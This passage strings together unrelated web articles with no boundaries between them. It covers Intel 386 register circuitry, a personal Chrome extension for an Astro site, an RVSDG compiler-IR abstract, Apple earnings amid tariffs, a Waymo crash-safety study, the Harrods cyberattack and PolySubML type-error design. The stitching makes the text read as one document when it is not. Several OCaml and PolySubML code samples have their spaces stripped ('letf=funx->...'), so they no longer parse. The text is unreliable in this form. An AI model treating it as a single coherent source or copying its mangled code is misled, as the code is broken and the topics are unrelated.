the 8-bit AH register, or the 8-bit AL register.
Note that reading part of a register doesn't require separate control lines: the register provides all 32 bits and
the reading circuit can ignore the bits it doesn't want.
Proceeding upward, the three (
c
) registers have a similar 10T implementation.
These registers, however, do not support partial writes so all 32 bits must be written at once.
As a result, these registers only require three control lines (two for reads and one for writes).
With fewer control lines, the cells can be fit into less vertical space, so the layout is slightly more compact than
the previous type (
e
) cells. The diagram below shows four type (
d
) rows above two type (
e
) rows.
Although the cells have the same ten transistors, they have been shifted around somewhat.
Four rows of type (
c
) above two cells of type (
d
).
Next are the four (
b
) registers, which support 16-bit writes and 32-bit writes (but not 8-bit writes).
Thus, these registers have four control lines (two for reads and two for writes).
The cells take slightly more vertical space than the (
c
) cells due to the additional control line, but the layout is
almost identical.
Finally, the (
a
) register at the top has an unusual feature: it can receive a copy of the value in the register just
below it.
This value is copied directly between the registers, without using the read or write buses.
This register has 3 control lines: one for read, one for write, and one for copying.
A cell of type (
a
), which can copy the value in the cell of type (
b
) below.
The diagram above shows a cell of type (
a
) above a cell of type (
b
).
The cell of type (
a
) is based on the standard 8T circuit,
but with six additional transistors to copy the value of the cell below.
Specifically, two inverters buffer the output from cell (
b
), one inverter for each side of the cell.
These inverters are implemented with transistors I1 through I4.
5
Two transistors, S1 and S2, act as a pass-transistor switches between these inverters and the memory cell.
When activated by the control line, the switch transistors allow the inverters to overwrite the memory cell with
the contents of the cell below.
Note that cell (
a
) takes considerably more vertical space because of the extra transistors.
Speculation on the physical layout of the registers
I haven't determined the mapping between the 386's registers and the 30 physical registers, but I can speculate.
First, the 386 has four registers that can be accessed as 8, 16, or 32-bit registers: EAX, EBX, ECX, and EDX.
These must map onto the (
d
) registers, which support these access patterns.
The four index registers (ESP, EBP, ESI, and EDI) can be used as 32-bit registers or 16-bit registers,
matching the four (
b
) registers with the same properties.
Which one of these registers can be copied to the type (
a
) register?
Maybe the stack pointer (ESP) is copied as part of interrupt handling.
The register file has eight 16-bit registers, type (
f
).
Since there are six 16-bit segment registers in the 386, I suspect the 16-bit registers are the segment registers and two additional registers.
The
LOADALL
instruction gives some clues, suggesting that the two additional 16-bit registers are
LDT (Local Descriptor Table register) and TR (Task Register).
Moreover,
LOADALL
handles 10 temporary registers, matching the 10 registers of type (
e
) near the bottom
of the register file.
The three 32-bit registers of type (
c
) may be the
CR0 control register and the DR6 and DR7 debug registers.
The six 16-bit segment registers in the 386.
In this article, I'm only looking at the main register file in the datapath.
The 386 presumably has other registers scattered around
the chip for various purposes.
For instance, the Segment Descriptor Cache contains multiple registers similar to type (
e
), probably holding cache entries.
The processor status flags and the instruction pointer (EIP) may not be implemented as discrete registers.
6
To the right of the register file, a complicated block of circuitry uses seven-bit values to select registers.
Two values select the registers (or constants) to read, while a third value selects the register to write.
I'm currently analyzing this circuitry, which should provide more insight into how the physical registers
are assigned.
The shuffle network
There's one additional complication in the register layout.
As mentioned earlier, the bottom 16 bits of the main registers can be treated as two 8-bit registers.
7
For example, the 8-bit AH and AL registers form the bottom 16 bits of the EAX register.
I explained earlier how the registers use multiple write control lines to allow these different parts of the register
to be updated separately.
However, there is also a layout problem.
To see the problem, suppose you perform an 8-bit ALU operation on the AH register, which is bits 15-8 of the EAX register.
These bits must be shifted down to positions 7-0 so they can take part in the ALU operation, and then must be shifted
back to positions 15-8 when stored into AH.
On the other hand, if you perform an ALU operation on AL (bits 7-0 of EAX), the bits are already in position and
don't need to be shifted.
To support the shifting required for 8-bit register operations, the 386's register file physically interleaves the bits of the two lower bytes (but not the high bytes).
As a result, bit 0 of AL is next to bit 0 of AH in the register file, and so forth.
This allows multiplexers to easily select bits from AH or AL as needed.
In other words, each bit of AH and AL is in almost the correct physical position, so an 8-bit shift is not required.
(If the bits were in order, each multiplexer would need to be connected to bits that are separated by eight positions,
requiring inconvenient wiring.)
8
The shuffle network above the register file interleaves the bottom 16 bits.
The photo above shows the shuffle network.
Each bit has three bus lines associated with it: two for reads and one for writes, and these all get shuffled.
On the left, the lines for the 16 bits pass straight through.
On the right, though, the two bytes are interleaved.
This shuffle network is located below the ALU and above the register file, so data words are shuffled when stored in the
register file and then unshuffled when read from the register file.
9
In the photo, the lines on the left aren't quite straight.
The reason is that the circuitry above is narrower than the circuitry below.
For the most part, each functional block in the datapath is constructed with the same width (60 µm) for each bit.
This makes the layout simpler since functional blocks can be stacked on top of each other and the vertical bus wiring
can pass straight through.
However, the circuitry above the registers (for the barrel shifter) is about 10% narrower (54.5 µm), so the wiring
needs to squeeze in and then expand back out.
10
There's a tradeoff of requiring more space for this wiring versus the space saved by making the barrel shifter
narrower and Intel must have considered the tradeoff worthwhile.
(My hypothesis is that since the shuffle network required additional wiring to shuffle the bits, it didn't take up
more space to squeeze the wiring together at the same time.)
Conclusions
If you look in a book on processor design, you'll find a description of how registers can be created from static memory cells.
However, the 386 illustrates that the implementation in a real processor is considerably more complicated.
Instead of using one circuit, Intel used six different circuits for the registers in the 386.
The 386's register circuitry also shows the curse of backward compatibility.
The x86 architecture supports 8-bit register accesses for
compatibility with processors dating back to 1971.
This compatibility requires additional circuitry such as the shuffle network and interleaved registers.
Looking at the circuitry of x86 processors makes me appreciate some of the advantages of RISC processors,
which avoid much of the ad hoc circuitry of x86 processors.
If you want more information about how the 386's memory cells were implemented, I wrote a
lower-level article
earlier.
I plan to write more about the 386, so
follow me on Bluesky (
@righto.com
) or
RSS
for updates.
Footnotes and references
Astro Linker Chrome Extension - A Fun Personal Project
A little Chrome extension for my own personal use. It helps make creating links on my site a bit easier.
The Problem
This site is built using
Astro
, and I’ve become a huge fan. I recently added a new feature that lets me add
Links
, which are
just links to other websites that I’ve found useful for one reason or another. The idea and implementation are working well, but I’ve encountered an issue
in actually
using
the feature because it’s just kind of a pain to have to create the file.
The current process is:
Grab the URL of the page.
Create a new file in the
src/content/links
directory.
Add the frontmatter to the file. I end up needing to copy/paste the URL, the title, and sometimes the description.
Commit the file, push to GitHub, and wait for the site to update.
It’s not
that bad
, but steps two through four all aren’t
that good
either.
The Solution
I’ve recently been building a Chrome extension at
SBLive
to help enhance the CMS experience for our journalists and editors.
The approach there was driven by the fact that our own team could quickly iterate on experimental features without having to wait for the development cycle of
the CMS itself.
Taking that experience, I realized it should be pretty easy to create a Chrome extension that would allow me to quickly create links on my site. I should be able to
just click a button and have the extension fill in the URL, title, and description for me.
The Code
I’m not sure how I feel about the term, but I
vibe coded
this one. It’s short, simple, and not half bad. You can see the GitHub repo:
It’s using TypeScript and TailwindCSS, which is definitely overkill but it makes me happy and that’s kinda the point, right? The process of creating a link
is now as easy as:
Click the button.
Maybe add tags, maybe update the title or description.
Click the save button.
Commit the file, push to GitHub, and wait for the site to update.
What’s Next?
It’s fresh and new, so I’m sure there are some rough edges that I haven’t noticed yet. The main feature that’s obviously lacking is the fact that I’ve still
got to go make a git commit and push the new link up to GitHub. It’d be great if I could just save the file directly from the extension. I’ve got a few
ideas on how to make that happen, maybe via a GitHub Action that I trigger on save?
I’ll noodle on that for a bit while I use it and see how it feels.
Dorky Takeaway
It’s very fun and refreshing to build something that’s so simple and useful to
me
. Something I’ll use all for myself.
Vibe coding using Cursor is a lot of fun.
RVSDG: An Intermediate Representation for Optimizing Compilers (2019)
Abstract:
Intermediate Representations (IRs) are central to optimizing compilers as the way the program is represented may enhance or limit analyses and transformations. Suitable IRs focus on exposing the most relevant information and establish invariants that different compiler passes can rely on. While control-flow centric IRs appear to be a natural fit for imperative programming languages, analyses required by compilers have increasingly shifted to understand data dependencies and work at multiple abstraction layers at the same time. This is partially evidenced in recent developments such as the MLIR proposed by Google. However, rigorous use of data flow centric IRs in general purpose compilers has not been evaluated for feasibility and usability as previous works provide no practical implementations. We present the Regionalized Value State Dependence Graph (RVSDG) IR for optimizing compilers. The RVSDG is a data flow centric IR where nodes represent computations, edges represent computational dependencies, and regions capture the hierarchical structure of programs. It represents programs in demand-dependence form, implicitly supports structured control flow, and models entire programs within a single IR. We provide a complete specification of the RVSDG, construction and destruction methods, as well as exemplify its utility by presenting Dead Node and Common Node Elimination optimizations. We implemented a prototype compiler and evaluate it in terms of performance, code size, compilation time, and representational overhead. Our results indicate that the RVSDG can serve as a competitive IR in optimizing compilers while reducing complexity.
Submission history
From: Nico Reissmann [
view email
]
[v1]
Tue, 10 Dec 2019 22:43:19 UTC (312 KB)
[v2]
Tue, 17 Mar 2020 22:27:27 UTC (304 KB)
Apple to report quarterly earnings amid Trump trade policy chaos
Guardian
www.theguardian.com
2025-05-01 20:00:46
Trump said consumer electronics will be exempted from his soaring tariffs on China but it is unclear for how long Investors have their eyes on Apple as it prepares to report financial results of the second quarter of the fiscal year on Thursday. The tech giant has been working to calm nervous analys...
Investors have their eyes on
Apple
as it prepares to report financial results of the second quarter of the fiscal year on Thursday. The tech giant has been working to calm nervous analysts after
Donald Trump
levied sweeping tariffs on countries around the world that are likely to complicate supply chains for consumer electronics. Since the beginning of the year, Apple’s stock has slumped 16%.
In anticipation of its earnings report, the company’s stock notched up slightly on Wednesday. Analysts are
predicting
a positive quarter for Apple with an average revenue estimate of $94.56bn, up 4.2% over last year, and earnings of $1.62 per share, up 5.8%. The company, worth $3.2tn, has beaten Wall Street’s expectations for the previous four quarters.
The iPhone maker is heavily reliant on Chinese manufacturing for its phones, tablets and laptops. Days after Trump instituted soaring tariffs on China, at one point
as high as 245%
, the president said he would
make an exception
for consumer electronics.
Apple’s CEO, Tim Cook, spoke to senior White House officials around this time, according to the
Washington Post
. It was after these conversations that Trump announced his exception for consumer electronics. Apple’s stock rose 7% in the days after the announcement.
However, it is unclear how lasting the reprieve may be. Howard Lutnick, the US commerce secretary, has
called the exemption “temporary”
, and even Trump later said on social media that there’s been no “exception”.
The president has repeatedly said he wants to see more manufacturing in the US. In February, he met with Cook to discuss investing in US manufacturing. “He’s going to start building,” Trump said after the meeting. “Very big numbers – you have to speak to him. I assume they’re going to announce it at some point.”
JP Morgan estimates costs would skyrocket for Apple if it moves production to the US, saying in a note this week that it could “drive a 30% price increase in the near-term, assuming a 20% tariff on China”. JP Morgan and other analysts have said Apple could continue to move more of its manufacturing to India, which only faces a 10% tariff.
Apple chartered jets to
airlift some $2bn worth of iPhones from India
to the US earlier this month to boost inventory in anticipation of price hikes from Trump’s tariffs and panic-buying by worried consumers. This comes as investors have expressed concerned about decreasing iPhone sales in China, the world’s biggest smartphone market. During its last earnings in January, Apple reported that
iPhone sales fell
by 11.1% in China in the first quarter and missed Wall Street’s expectations for iPhone revenue.
In the short term, however, analysts say the tariff confusion could benefit
Apple
with people panic-buying its products in fear that prices will rise.
“
What remains to be seen in the longer term is how much of any increased cost will be passed on to consumers,” said Dipanjan Chatterjee, principal analyst for Forrester. “And if [consumers] will absorb these price increases without pulling back on demand for Apple products.”
New Study: Waymo is reducing serious crashes and making streets safer
The path to Vision Zero requires reducing severe crashes and improving the safety of those most at risk. Our
latest research paper
shows that the Waymo Driver is making significant strides in both areas. By reducing the most dangerous crashes and providing better protection for pedestrians, cyclists, and other vulnerable road users, Waymo is making streets safer in cities where it operates.
The paper, accepted to be published in the Traffic Injury Prevention Journal, expands on our
Safety Impact Hub
research, providing a deeper analysis of Waymo’s performance across 11 different crash types compared to human drivers. It also offers new insights into Waymo’s positive impact on serious injury crash rates.
Types of crashes used for the Waymo Driver and human benchmark comparisons
The research finds that, compared to human benchmarks over 56.7 million miles and regardless of who was at fault, the Waymo Driver had:
Safer interactions with vulnerable road users (VRUs)
with
substantial reductions in crashes involving injuries among pedestrians (92% reduction), cyclists (82% reduction), and motorcyclists (82% reduction).
96% fewer injury-involving intersection crashes
, which, according to NHTSA, are a leading cause of severe road harm for human drivers. This reduction can be largely attributed to the Waymo Driver’s ability to detect and appropriately respond to vehicles running a red light.
85% fewer crashes with suspected serious or worse injuries
. Building on our previous research, which demonstrated Waymo’s significant reductions across all injuries combined, the new study provides early evidence for similar benefits in serious injuries alone. The results are statistically significant but because serious injury cases are, fortunately, rare, they’re based on a small number of events. We will continue to monitor outcomes and gain greater confidence as we accumulate more miles.
These findings add to the growing body of data that the Waymo Driver is reducing the most dangerous crash types, contributing to safer roadways, and pushing forward a vision of zero traffic deaths and serious injuries on our roads. While this particular research did not account for crash contribution, a previous
study
led by the insurance company Swiss Re demonstrated that the Waymo Driver’s positive impact is even more significant when contribution is taken into account.
“It’s exciting to see the real positive impact that Waymo is making on the streets of America as we continue to expand,”
said Mauricio Peña, Waymo’s Chief Safety Officer.
“This research reinforces the growing evidence that the Waymo Driver is playing a crucial role in reducing serious crashes and protecting all road users.”
“It’s encouraging to see real-world data showing Waymo outperforming human drivers when it comes to safety. Fewer crashes and fewer injuries — especially for people walking and biking — is exactly the kind of progress we want to see from autonomous vehicles,” — said
Jonathan Adkins, Chief Executive Officer at Governors Highway Safety Association.
As Waymo increases in scale, we look forward to strengthening our safety data, assessing the long-term impact on road safety, and helping to advance conversations amongst researchers, policymakers, and safety groups.
We look forward to continuing this conversation and working toward a future where serious traffic injuries, one of the biggest causes of death in the U.S, are dramatically reduced. For those interested in a deeper dive into the data and methodology, we encourage you to explore the
full study
, and our rolling
safety data hub
.
Harrods the next UK retailer targeted in a cyberattack
Bleeping Computer
www.bleepingcomputer.com
2025-05-01 19:33:25
London's iconic department store, Harrods, has confirmed it was targeted in a cyberattack, becoming the third major UK retailer to report cyberattacks in a week following incidents at M&S and the Co-op. [...]...
London's iconic department store, Harrods, has confirmed it was targeted in a cyberattack, becoming the third major UK retailer to report cyberattacks in a week following incidents at M&S and the Co-op.
In a statement shared with BleepingComputer, Harrods says threat actors recently attempted to hack into their systems, causing the company to restrict access to sites.
"We recently experienced attempts to gain unauthorised access to some of our systems," Harrods told BleepingComputer.
"Our seasoned IT security team immediately took proactive steps to keep systems safe and as a result we have restricted internet access at our sites today."
"Currently all sites including our Knightsbridge store, H beauty stores and airport stores remain open to welcome customers. Customers can also continue to shop via harrods.com."
"We are not asking our customers to do anything differently at this point and we will continue to provide updates as necessary."
Harrods has not shared any further details in response to BleepingComputer's questions, such as whether systems were breached or if data was stolen.
However, the decision to restrict access to some platforms indicates that they are actively responding to the attack.
This incident follows shortly after two other prominent UK retailers, Marks and Spencer and Co-op disclosed cyberattacks.
BleepingComputer later confirmed the attack was linked to threat actors associated with the "Scattered Spider" tactics, who
deployed the DragonForce ransomware
on the company's network.
Yesterday, Co-op also disclosed a cyber incident, stating they experienced attempts to hack into their network.
However, an internal email sent by Chief Digital and Information Officer Rob Elsey and
seen by ITV News
indicates the breach is larger than initially stated, telling employees that VPN access was disabled and urging staff to be vigilant when using email and Microsoft Teams.
"When running a Microsoft Teams call, please ensure all attendees are as expected and that users are on camera," reads a portion of the email.
"Don't post sensitive information in the Teams chat function such as colleague, client, customer or member related data."
Law enforcement has not released an official advisory related to these attacks, but as M&S and Co-op are both believed to have started with social engineering attacks, we will likely see a bulletin released shortly.
Designing type inference for high quality type errors
Type inference has a reputation for causing unhelpful error messages from the compiler when there is a type error. For example, here’s a typical comment:
However, things don’t have to be this way. Type inference’s bad reputation is due to design decisions in existing languages that sacrifice good error messages in exchange for other goals. There is nothing inherent to type inference that prevents you from offering good error messages.
I recently released
PolySubML
, a programming language combining global type inference with subtyping and advanced polymorphism, and supporting good type error messages was a constant consideration during development. In this post, I will explain how I designed PolySubML’s error messages and why I think existing languages tend to fall short in this respect.
But first, a few disclaimers:
First off, this post is solely concerned with error messages for
type errors
. Dealing with
syntax errors
, particularly parser errors, is a completely different topic that is outside the scope of this post.
Second, the focus here is helping the user to
understand why their code won’t compile
and identify the cause of the error. In some cases, compilers will also attempt to guess what the user meant and suggest a fix, but this is inherently heuristic-based and subjective, and outside the scope of this post.
Lastly, PolySubML is an experimental hobby programming language that has never been used at large scale. It is a
proof of concept
and
demonstration
of my ideas, but it is a very different sort of beast than widespread battle-tested languages. Since PolySubML is a one-person hobby project, the focus is on the
underlying algorithms
and design aspects, rather than aspects like polish which are a function of time and people (the Rust compiler in particular has had almost infinite polish applied over the years, thanks to its incredibly large and dedicated community.)
With that out of the way, let’s get on to the pitfalls that often make compiler error messages suck:
Rule 1: Never guess or backtrack
Generally speaking, users think their code is correct when submitting it to the compiler. Sometimes, people will speculatively compile to try to identify bugs or places that need to be updated during a refactor, but even then, the user merely thinks that there might be bugs
somewhere
in the abstract. They won’t be convinced of the presence of bugs unless the compiler provides specific evidence explaining where and why there is a bug. (Or rather, a violation of the language’s typing rules which
often
but not necessarily indicates a bug.)
The job of a compiler error message is to prove to the user that their code is invalid
according to the language’s rules, ideally in a way that helps the user identify where they went wrong and how the problem can be corrected.
Abstractly, the process of type checking can be modeled as deriving
a set of facts
about the code, with specific rules for deriving new facts based on previous facts, with the rules determined by the language. For example, you might have reasoning along the lines of “
4
has type int” and “if
4
has type int, then after
let x = 4
,
x
also has type int” and “in
x.foo
,
x
is required to be a record”, and “if an expression of type int is used as a record, the program is invalid”.
The general form of the rules is “if A and B and C, then D”, where the typechecker continually derives facts from the right hand side of rules once the left hand side is satisfied. Eventually it either derives a contradiction and reports a type error, or it doesn’t and the code compiles successfully. This leads to proofs that are relatively short and easy to understand - once a contradiction is reached, you can easily work backwards and show the user a sequence explaining exactly why their code is invalid, step by step. (Realistically, you probably don’t want to show the user
every
step for reasons of verbosity, but the point is that you
could
if necessary. More on this in section 3.)
However, this all goes wrong if your language includes rules of the form “if A and B and C, then D
or E
”. Suddenly, instead of proceeding monotonically from start to finish, the compiler has to
guess
how to proceed. This means that the compiler has to try
every possibility
in order to discover a type error. For example, if you know A, B, and C, that lets you conclude “D or E”, but “D or E” doesn’t help at all by itself. If say, D turns out to lead to a contradiction, you can’t immediately report an error like before - instead you have to backtrack and see if E leads to a contradiction
too
.
Ad-hoc overloading
The above description is very abstract, so let’s look at a more concrete example - specifically
ad hoc overloading
. In some languages, you might have multiple different functions with the same name and different type signatures, and the compiler needs to try each one in turn and can only report a type error if
every single possible choice
results in an error.
For example, in Java, you might have something like
Where
A
,
B
, and
C
are distinct types. In order to type check
foo(v)
, the compiler has to try all three possible
foo
functions to see if
any
of them typecheck. If
v
has type
C
, then it will first try
A
, find a type error, backtrack and try
B
, find a type error, backtrack
again
and try
C
, and finally find a valid match. If
v
instead had some
other
type, say
D
, then the typechecker would have to try all three functions before it could prove there is a type error.
So why is this so bad? Having to guess and backtrack will make typechecking very slow, but it
also
makes compiler error messages terrible.
Without guessing, error messages are simple and easy because there is a direct chain of reasoning leading to a contradiction. However, when the typechecker has to make guesses like with the overloading example, that all goes out the window.
In order to prove to the user that
foo(v)
has a type error, the compiler has to prove that
v
does not have type
A
(with some chain of reasoning)
and
prove that
v
does not have type
B
(with another chain of reasoning)
and
also prove that
v
does not have type
C
. Suddenly, the proof of an error is three times as long. But worse yet,
this is completely useless to the user
.
The
user
doesn’t care about
every
possibility. The user intended to call
some specific
function
foo
, not every possible function. Perhaps they
intended
for
v
to have type
B
and made a mistake. (Or perhaps
v
having type
D
is correct but they mistakenly thought that there is a version of
foo
which takes
D
as argument.)
If the user intended
v
to have type
B
, then what they care about is the proof that
v
does
not
have type
B
(so they can figure out what the mistake was and correct it). They don’t care at all that the compiler also checked the hypothetical possibilities of
A
and
C
and found that those don’t work either, since they never intended for that to be the case in the first place!
If you force the typechecker to make guesses, it will guess things the user didn’t intend, and the resulting error messages will be bloated and irrelevant to the user.
Going exponential
From the previous example, you might agree that overloading is bad, but not
that
bad. After all, checking the type of the argument should be trivial in this case since the types involved are so simple (assuming no inheritance or anything at least). However this was the simplest possible case, for the sake of example. Overloading gets worse.
Much
worse.
For example, usually languages do not force users to annotate a type on
literally every expression in the program
. Which means that oftentimes the type of something is temporarily unknown and has to be inferred. Instead of just checking the known type of
v
against
A
,
B
, and
C
and immediately detecting a contradiction, you might have to go through a whole chain of inference to rule out each case.
Even worse than that, functions often have multiple arguments, and so guessing which overload to use
also
influences what types every
other
argument to the function is expected to take as well. That means that the guess cascades, and for each guess of the first argument, you have to independent check the other arguments, which may in turn involve yet more guesses and backtracking. Likewise, checking the type of the argument may be non trivial when the type is generic, and so checking a guess for the top level type requires recursion to check the type parameters, which in turn involve more guesses.
This means that such guessing will often blow up
exponentially
. For every top level guess, you have to try every possibility at the second level decision point, and for each of
those
, you have to try every possibility at the third level decision point, etc.
Even worse is C++, where its template system runs on the principle of
“substitution failure is not an error”
, which roughly means “try every possibility and only report an error if every single combination of choices leads to a failure”. This means that usage of templates often results in a) exponential increases in compilation time and b) exponentially large compile error messages. Even worse, abuse of this “feature” became
standard practice
in the C++ community (referred to as “template metaprogramming”). C++ is legendary for being slow to compile and having
massive
completely incomprehensible error messages, and this is a major reason why.
Therefore, the first and most important step to ensure good error messages is to
design your type system so the typechecker never has to guess or backtrack
.
Rule 2: Don’t jump to conclusions
The first rule merely afflicts
most
real-world programming languages. Now it’s time to get
really
controversial with something that nearly every language gets wrong.
Consider the following Ocaml code:
Compiling this results in an error message:
File "bin/main.ml", line 1, characters 12-14:
1 | let _ = [1; ""]
^^
Error: This expression has type string but an expression was expected of type
int
This error message tells us that
""
has type
string
, which is good, but it also claims that it was expected to have type
int
for no apparent reason, which is less good. There is nothing inherent about lists in Ocaml that requires them to be ints. Something like
[""; ""]
would compile just fine. The
actual
cause of the conflict is something that Ocaml didn’t highlight at all - the
1
next
to the highlighted portion.
Now in this case, the example is small enough that the user could probably deduce the actual cause of the mismatch just by looking at the code
near
the point of the error. However, as the code becomes bigger and more complex, that quickly becomes impossible. For example, consider the following:
type'aref={mutablev:'a}letv={v=`None}(* Fake identity function which secretly stores the value in shared mutable state *)letf=funx->(matchv.vwith|`None->let_=v.v<-`Somexinx|`Someold->let_=v.v<-`Somexinold)(* assume lots of code in between here *)(* blah blah blah *)let_=1+f1(* assume lots of code in between here *)(* blah blah blah *)let_=5.3-.f2.1
This produces the following, rather unhelpful error message:
File "bin/main.ml", line 19, characters 17-20:
19 | let _ = 5.3 -. f 2.1
^^^
Error: This expression has type float but an expression was expected of type
int
That’s it, the entire compiler output. Again, we can see that the highlighted expression is a
float
, but there’s absolutely no indication of
why
Ocaml expected it to be an
int
instead.
Unlike the previous example, looking at the surrounding code won’t make it any clearer either. Even looking at the definition of the
f
function being called nearby doesn’t help as
f
doesn’t have an explicit type signature. The actual cause of the mismatch is a different
call
to
f
in a different part of the code, with no indication of how to find it.
The fundamental problem here is that when Ocaml requires two types to be equal, it doesn’t actually keep track of the types that it expected to be equal. It just blindly
assumes that whichever type it happens to see first is the gospel truth
and proceeds under that assumption. Doing it this way does make typechecking slightly faster (due to having to track less data), presumably the reason that the Ocaml compiler is implemented this way. However, the result is completely unhelpful error messages.
If the user writes
[1; ""]
, then maybe they intended it to be a list of ints and the
""
is incorrect. But it could
also
be the case that they intended to have a list of strings and the
1
is the incorrect part. (Or possibly, the user was just not aware that Ocaml forbids having both ints and strings in the same list and will be left confused either way as long as the error message doesn’t explain this restriction.)
So what would a better error message look like? Let’s look at how PolySubML handles the same example. The code isn’t quite directly comparable because PolySubML doesn’t force type equality like this in the first place, but in this particular example, the end result is still the same, so it still offers a useful comparison.
Here’s the same code from before, translated to PolySubML:
letv={mutv=`None0};(* Fake identity function which secretly stores the value in shared mutable state *)letf=funx->(matchv.v<-`Somexwith|`None_->x|`Someold->old);(* assume lots of code in between here *)(* blah blah blah *)let_=1+f1;(* assume lots of code in between here *)(* blah blah blah *)let_=5.3-.f2.1;
And here’s what the PolySubML compiler outputs:
TypeError: Value is required to have type float here:
(* blah blah blah *)
let _ = 5.3 -. f 2.1;
^~~~~~~~
However, that value may have type int originating here:
(* blah blah blah *)
let _ = 1 + f 1;
^
(* assume lots of code in between here *)
Hint: To narrow down the cause of the type mismatch, consider adding an explicit type annotation here:
match v.v <- `Some x with
| `None _ -> x
| `Some (old: _) -> old
+ ++++
);
Notice how PolySubML shows both sides of the conflict, where a value of type
int
originates and then flows to a place where type
float
is required. Not only that, but the error message also suggests a place to add a manual type annotation to help narrow down the cause of the mistake. This brings us to the next rule, a technique I came up with for PolySubML which as far as I know has not been done before.
Rule 3: Ask the user to clarify intent
In my previous language,
CubiML
, type error messages show where a) a value originates with a certain type and then b) flows to a use where it is required to have an incompatible type. For simple cases, this is already enough for the user to understand the problem. However, thanks to type inference, there might be an arbitrarily long and complex path from a) to b) which the user won’t understand. For example, in the previous section, the int flows into a function call, through a mutable field, a match expression, and then back out of the function to a different call of the same function.
As described in the previous sections, there is a chain of inference starting from the provided source code and the language’s rules which lead to a contradiction. However, the compiler doesn’t know
which part
of that chain contains the problem. The user’s mistake could be at any point in that chain.
One approach would be to show the user the entire chain of reasoning leading to the contradiction. That would certainly ensure that the part with the true mistake is also shown. However, long error messages are useless because the user won’t be able to actually hunt through the lengthy output to find the one part that’s actually relevant to them. Therefore, we need to keep error messages relatively short, which seems like an impossible contradiction.
Fortunately, there’s another possibility -
ask the user for clarification
to narrow down the location of their mistake. Instead of presenting the entire chain to the user, just ask for the ground truth at one point in the chain, which will in turn rule out one half and allow you to progressively narrow down the location of the mistake.
For example, look at the last part of the PolySubML error message shown in the previous section:
Hint: To narrow down the cause of the type mismatch, consider adding an explicit type annotation here:
match v.v <- `Some x with
| `None _ -> x
| `Some (old: _) -> old
+ ++++
);
In the case of a type error, PolySubML makes a list of every inference variable involved in the conflicting chain, and then picks one (usually near the middle) and suggests that the user add an explicit type annotation for it.
Assuming the user adds a correct type annotation, that narrows down the problem. For example, suppose you have something like
int -> x -> y -> z -> float
, where a value of type
int
flows to a use of type
float
, passing through points
x
,
y,
and
z
, on the way.
Suppose we suggest that the user add a type annotation to
y
. Perhaps the user intended for it to be an
int
, in which case we get
int -> x -> int -> z -> float
and the conflict is narrowed down to the
int -> z -> float
part. Or perhaps they meant for it to be a
float
, in which case the conflict is narrowed down to
int -> x -> float
. Either way, the location of the user’s mistake has been narrowed down.
Suggesting locations for type annotations like this is especially effective because that’s likely what the user would be doing anyway. Faced with a confusing type error that they can’t figure out, users will often start adding extra type annotations to their code to try to narrow down the problem.
However, if the user doesn’t know where the problem is, they often also won’t know where it would be useful to add type annotations
either
, and will waste a lot of effort without getting anywhere. With PolySubML by contrast, the compiler explicitly highlights a location where adding a type annotation is
guaranteed
to help narrow down the cause of the mistake, leading to much faster and more effective debugging.
Aside: Why even have type inference?
Opponents of type inference will often ask what the point of even having type inference is if you have to add type annotations to track down errors. First, there’s the obvious rebuttal that regardless of language, nobody ever annotates
every single expression
in the program, because that’s just not feasible or useful, and so everyone supports type inference to some extent, it’s only a matter of degree.
But the other point is that having to annotate 5% of your code 5% of the time is much less work than being required to preemptively annotate 100% of your code 100% of the time. And especially with PolySubML, it will lead you directly to the problem, meaning few annotations are required to find it. And if you really want to, you can just remove the type annotations again afterwards (though you’ll often want to leave them around as documentation, etc.)
When type annotations aren’t enough
When a type conflict involves one or more inference variables, PolySubML will display the endpoints of the conflict and
also
will suggest explicitly annotating one of those inference variables to help narrow down the cause of the conflict if it is not clear to the user.
That’s all well and good, you might wonder, but what happens in the case of a type conflict that
doesn’t
involve any inference variables? That’s a good question and I unfortunately don’t have a good answer to it.
The good news is that such conflicts are inherently localized. For example, in the PolySubML typechecker, every function has a typed signature. If the user does not provide explicit types for the function, the compiler just implicitly inserts inference variables and uses those instead. This means that any type conflict which does not involve inference variables is also guaranteed to not cross any function boundaries.
Likewise, the compiler also inserts inference variables when there is no explicit type annotation for mutable record fields, nontrivial pattern matching, polymorphic instantiation, and most variable assignments, among other things. This means that the scope of a type conflict is inherently limited if it does not pass through any inference variables.
In the case of a conflict with no inference variables, PolySubML will display the endpoints of the conflict (like usual) and also display the expression where the conflict was detected during type checking. For example, in the following code:
letf=fun(x:int):int->x+1;leta=42.9;let_=fa;
PolySubML’s error message is as follows:
TypeError: Value is required to have type int here:
let f = fun (x: int): int -> x + 1;
^~~
let a = 42.9;
let _ = f a;
However, that value may have type float originating here:
let f = fun (x: int): int -> x + 1;
let a = 42.9;
^~~~
let _ = f a;
Note: Type mismatch was detected starting from this expression:
let f = fun (x: int): int -> x + 1;
let a = 42.9;
let _ = f a;
^
Hopefully, these three data points along with the constrained scope of the conflict will be enough for users to understand the issue in most cases. However, I’m concerned that in especially complex cases, that may not be enough.
The fact that there are no inference variables involved in a type conflict implies that the code effectively has two conflicting types right next to each other. However, if the types are especially big and complex, the user may not be able to determine the problematic parts, even with the conflicting types side by side.
I’m not sure what a good solution to that problem would be. Unlike with chains of
data flow
, where there is the widely accepted and understood solution of adding intermediate type annotations to narrow down the problem, there’s no way for the user to explicitly clarify intent
within the middle of a complicated type signature itself
. If anyone has a solution to this problem, please let me know. (Note that this is a problem any language will have, whether or not you’re doing type inference.)
Rule 4: Allow the user to write explicit type annotations
In you’re going to suggest that the user add explicit type annotations to help narrow down errors, you need to also make it
possible
for the user to add explicit type annotations.
For example, consider
generic functions
. A generic function is one that operates on placeholder types (aka type variables) which can be substituted for any type later, and in particular can be substituted for multiple
different
types at different points in the code.
In PolySubML, an example of a generic function is
fun (type t) (x: t): t -> x
. This is an identity function which can operate on
any
type. Instead of the type signature mentioning a specific type, it is defined with the type parameter
t
. Whenever the function is called, the type parameters are substituted with inference variables, with different inference variables at each callsite, a process called
instantiation
.
This leads to the question: Is there syntax for
explicit
type instantiation? PolySubML was designed to follow Ocaml syntax as closely as possible. In Ocaml, there is no syntax for explicitly providing types when instantiating a generic type. They presumably didn’t see the need, since the instantiated types can always be inferred anyway.
However, just because the types
can
be inferred doesn’t mean there is no need for explicit syntax. After all, the user might want to explicitly provide the types in order to narrow down type errors, document the types, or place additional constraints on the code.
Consider the following example:
letf=fun(typet)(x:t):t->x;let_:float=f42;
In the
f 42
code,
f
could
be instantiated with
t=int
, in which case it will conflict with the expected return type of
float
. Alternatively, it could be instantiated with
t=float
, in which case the return type is correct but it conflicts with the argument type of
int
